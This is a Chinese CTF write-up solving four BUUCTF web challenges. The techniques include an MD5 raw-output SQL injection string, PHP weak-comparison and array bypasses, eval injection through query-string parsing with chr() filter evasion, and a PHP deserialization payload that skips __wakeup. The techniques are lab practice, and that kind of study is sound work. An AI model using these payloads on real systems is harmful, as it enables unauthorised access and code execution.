buuctf 刷题2(md5(true)参数漏洞php字符串解析特性phpdirsearchphp反序列化)
[BJDCTF2020]Easy MD5 1
burp抓包,发现传入的参数的语句为:
Hint: select * from 'admin' where password=md5($pass,true)
md5函数介绍为:
md5( string , raw )
string : 规定需要计算的字符串
raw : 规定十六进制或二进制输出格式。
true:16字符二进制格式
false(默认): 32字符十六进制数
md5 true参数漏洞有
ffifdyop字符串会造成漏洞。md5('ffifdyop',true)=’or’6xxxxxx
因此传入ffifdyop之后,数据库查询语句变为:
select * from ‘admin’ where password= '' or ’6xxxxxx ’ ,变成 ‘’ or 6,可以得到
查看源码得知:
<!--
$a = $GET['a'];
$b = $_GET['b'];if($a != $b && md5($a) == md5($b)){// wow, glzjin wants a girl friend.
-->要满足a !=b ,且md5($a) == md5($b).php弱类型比较,
因此传入a=240610708 b=QNKCDZO。
这两个md5加密后为0e开头。弱类型比较满足判断。
又得到一段代码
<?php
error_reporting(0);
include "flag.php";highlight_file(__FILE__);if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){echo $flag;
} 要满足param1!==param2,并且md5(param1)===md5(param2). ===强类型比较,
不过md5函数仍有一个漏洞,当我们输入的值为数组时,会返回NULL值,NULL===NULL绕过。
因此post传入param1[]=1,param2[]=2.
得到flag。
[RoarCTF 2019]Easy Calc 1
查看源码,还是没思路。看别人题解可知:
查看源码可以得到:
url:"calc.php?num="+encodeURIComponent($("#content").val()),
访问calc.php.
<?php
error_reporting(0);
if(!isset($_GET['num'])){show_source(__FILE__);
}else{$str = $_GET['num'];$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];foreach ($blacklist as $blackitem) {if (preg_match('/' . $blackitem . '/m', $str)) {die("what are you want to do?");}}eval('echo '.$str.';');
}
?>PHP的字符串解析特性简单介绍:
假如waf不允许num变量传递字母:
http://www.xxx.com/index.php?num = aaaa //显示非法输入的话
那么我们可以在num前加个空格:
http://www.xxx.com/index.php? num = aaaa
这样waf就找不到num这个变量了,因为现在的变量叫“ num”,而不是“num”。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。
scandir(' / ')扫描根目录下所有文件。
? num=print_r(scandir('/'));
// 然而因为单引号被过滤。用chr(47)来绕过。(chr(47)是 / )
? num=print_r(scandir(chr(47)));
发现flag的踪迹,f1agg
读取f1agg文件 用file_get_contents('/f1agg').
? num=file_get_contents('/f1agg');
// 因为单引号过滤,用chr()绕过,/f1agg分别对应chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)
? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
得到flag。
[极客大挑战 2019]PHP1
题目提到他经常备份,dirsearch扫描一下他的可能的备份文件。
python dirsearch.py -u http://04eb2456-aa7f-470f-912b-f0854e6a5f0d.node4.buuoj.cn:81 -e * -w db/dicc.txt
探测到 www.zip文件
打开发现flag.php,输入发现flag是假的。
然后继续看class.php
<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>index.php文件里有
<?phpinclude 'class.php';$select = $_GET['select'];$res=unserialize(@$select);?>代码审计,发现这是一道反序列化的题目。
因此我们要满足,Name类里,
$this->password == 100 ,$this->username === 'admin' ,并且绕过_wakeup()魔法函数
因此我们给select传入修改后的Name类的序列化
?select = O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;};
不知道为什么,自己手工写出来的,他不识别,最好用php编辑器出来的复制运用。因此用下面的,不用上面这个。
(1)因为Name类里属性定义是private类型,因此序列化之后会在 %00Name%00username。php在线编辑器帮我们序列化之后并不会显示%00。需要我们自己补上。
?select = O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
(2)调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过,把Name后面的2改为3或以上即可
?select = O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
(3)url不识别"",因此urlencode一下。
hackbar loadurl 一下 execute得到flag
ACTF2020 新生赛]BackupFile 1
Try to find out source file!
之后就没有任何信息了。用dirsearch扫描一下目录:
-u+地址 -e选择语言 -w选择字典
python dirsearch.py -u http://26aff866-378e-4d85-8ee9-73dded16a211.node4.buuoj.cn:81 -e * -w db/dicc.txt
发现index.php.bak备份文件。
访问下载得到
<?php
include_once "flag.php";if(isset($_GET['key'])) {$key = $_GET['key'];if(!is_numeric($key)) {exit("Just num!");}$key = intval($key);$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";if($key == $str) {echo $flag;}
}
else {echo "Try to find out source file!";
}
代码审计,根据php==弱比较,传入?num=123即可满足条件,得到flag。
buuctf 刷题2(md5(true)参数漏洞php字符串解析特性phpdirsearchphp反序列化)相关推荐
- BUUCTF刷题笔记
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...
- buuctf刷题-Crypto-联想脑洞-达芬奇密码
buuctf刷题-Crypto-联想脑洞-达芬奇密码 给了两串数字和提示: (答案是一串32位十进制数字) 达芬奇隐藏在蒙娜丽莎中的数字列:1 233 3 2584 1346269 144 5 196 ...
- buuctf刷题9 (反序列化逃逸shtml-SSI远程命令执行idna与utf-8编码漏洞)
目录 安洵杯2019 easy_serialize_php (反序列化中的对象逃逸) [0CTF 2016]piapiapia(反序列化逃逸) [BJDCTF2020]EasySearch(Apach ...
- BUUCTF刷题记录(7)
文章目录 web [NPUCTF2020]ezinclude [NPUCTF2020]ReadlezPHP [GXYCTF2019]BabysqliV3.0 非预期1 非预期2 预期 [NCTF201 ...
- BUUCTF刷题记录(2)
文章目录 web [De1CTF 2019]SSRF Me(未完成) [极客大挑战 2019]PHP [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [RoarCTF 20 ...
- buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
[护网杯 2018]easy_tornado 1 访问页面所给的可以得到 /flag.txt flag in /fllllllllllllag 可知flag在/fllllllllllllag. /w ...
- 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...
- buuctf 刷题 6(WEB-INF/web.xmlSmarty模板注入py脚本编写)
[RoarCTF 2019]Easy Java 进去页面,得到一个登录框.因为题目是java,应该不是sql注入, 点开help,看见: filename参数可控 .没做过相应的java安全题目.看其 ...
- BUUCTF刷题——metasequoia_2020_samsara
终于学到堆了,这道题做了三遍才来写这篇博客,算是对题有了较深地体会吧. 堆题的变量确实比栈题要多啊. 观察各个case部分: 思路 1.先malloc chunk0,1,2.先利用double fre ...
最新文章
- Leetcode 674.最长递增序列
- HashSet集合存储数据的结构(哈希表)及set集合存储元素不重复的原理
- matlab参考答案2011至诚,职高数学试卷答卷答案详解
- C/C++ 基本类型注意事项
- 【weblogic】部署jfinal编写的应用
- 带有HttpClient的自定义HTTP标头
- 【Python CheckiO 题解】Text Editor
- DataGrid与GridView的区别应用小实例
- 编程范式之命令式与函数式
- kafka最好用的脚本一:kafka-topic
- SQLite第九课 sqlite3_set_authorizer案例
- 推荐一个 Java 实体映射工具 MapStruct 1
- LeetCode--Reverse Integer(整数反转)Python
- win7下linux 双系统安装教程,【系统安装】双系统——Win7下安装linux系统详细步骤...
- 算法竞赛入门经典 电子书(附习题解析)网盘下载
- PS 如何导出ico图标
- 【项目经验】产研流程(超级详细的步骤)
- 海康视频下载,以及实时视频预览
- 文字烫金效果html,ps如何制作烫金效果 PS制作logo烫黄金效果教程
- canvas动画科技园_Canvas 写的酷炫动画代码分析